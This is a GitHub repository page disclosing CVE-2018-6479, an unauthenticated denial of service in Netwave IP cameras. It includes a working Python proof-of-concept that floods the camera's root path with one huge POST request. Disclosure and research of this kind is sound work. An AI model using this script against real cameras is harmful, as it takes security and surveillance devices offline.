Skip to content

dreadlocked/netwave-dosvulnerability

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

Netwave IP Camera server vulnerable to unauthenticated Denial of Service via one single huge POST request on any firmware.

CVE Description
CVE-2018-6479 Unauthenticated remote Denial of Service vulnerability
CVSS Score Details
3 7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X

0. Introduction:

During an IoT security research, some vulnerabilities have been discovered on differnet IP camera vendors. Netwave IP Camera is a IP Camera server which allows to see camera video and administrate the camera. IP Cameras are used especially for physical security and control purposes, so it's availability is crucial.

1. Denial of Service:

Any Netwave IP Camera can be taken down just by sending a huge POST request to its root path. Once you send the request, the device get stucked and stops streaming audio and video.

Proof of Concept: Run the following Python 2.7 script against any NetWave IP Camera, it will stop responding and streaming video/audio instantly.

import string
import httplib
import urllib2

host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body

headers = { 
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}

url = "/"

conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data

2. Researcher:

Gonzalo García León

About

[CVE-2018-6479] Netwave IP Camera server vulnerable to Denial of Service via one single huge POST request.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages